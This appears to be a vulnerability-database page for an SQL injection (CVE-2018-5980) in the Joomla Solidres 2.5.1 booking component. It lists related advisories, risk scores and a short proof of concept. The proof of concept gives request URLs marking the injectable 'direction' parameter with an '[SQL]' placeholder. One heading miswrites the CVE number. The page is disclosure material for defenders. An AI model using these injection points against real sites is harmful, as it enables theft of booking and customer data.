Joomla! Solidres 2.5.1 SQL Injection

🗓️ 17 Feb 2018 00:00:00Reported by Ihsan SencanType

packetstorm🔗 packetstormsecurity.com👁 36 Views

Joomla! Component Solidres 2.5.1 SQL Injection, CVE-2018-598

Reporter	Title	Published	Views	Family All 14
0day.today	Joomla Solidres 2.5.1 Component - SQL Injection Vulnerability	17 Feb 201800:00	–	zdt
CVE	CVE-2018-5980	17 Feb 201807:00	–	cve
Cvelist	CVE-2018-5980	17 Feb 201807:00	–	cvelist
Exploit DB	Joomla! Component Solidres 2.5.1 - SQL Injection	16 Feb 201800:00	–	exploitdb
Tenable Nessus	EulerOS 2.0 SP1 : mailman (EulerOS-SA-2018-1086)	2 May 201800:00	–	nessus
Tenable Nessus	EulerOS 2.0 SP2 : mailman (EulerOS-SA-2018-1087)	2 May 201800:00	–	nessus
EUVD	EUVD-2018-17745	7 Oct 202500:30	–	euvd
exploitpack	Joomla! Component Solidres 2.5.1 - SQL Injection	16 Feb 201800:00	–	exploitpack
Joomla! Vulnerable Extensions List	Solidres, 2.5.0, SQL Injection	23 Feb 201800:00	–	joomla
NVD	CVE-2018-5980	17 Feb 201807:29	–	nvd

`# # # #   
# Exploit Title: Joomla! Component Solidres 2.5.1 - SQL Injection  
# Dork: N/A  
# Date: 16.02.2018  
# Vendor Homepage: http://solidres.com/  
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/solidres/  
# Version: 2.5.1  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-5980  
# # # #  
# Exploit Author: Ihsan Sencan   
# # # #   
#   
# POC:  
#   
# 1)  
# http://localhost/[PATH]/index.php/en/component/solidres/?location=&checkin=2018-01-08&checkout=2018-01-09&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=0&option=com_solidres&task=hub.search&start=0&Itemid=306&9f3d70a896d5f1332174599ecac43607=1&ordering=score&direction=desc[SQL]&type_id=12  
#   
# http://localhost/[PATH]/index.php/en/component/solidres/?checkin=2018-01-08&checkout=2018-01-09&option=com_solidres&task=hub.search&direction=desc[SQL]  
#   
# # # #  
`

17 Feb 2018 00:00Current

8.1High risk

Vulners AI Score8.1

EPSS0.01411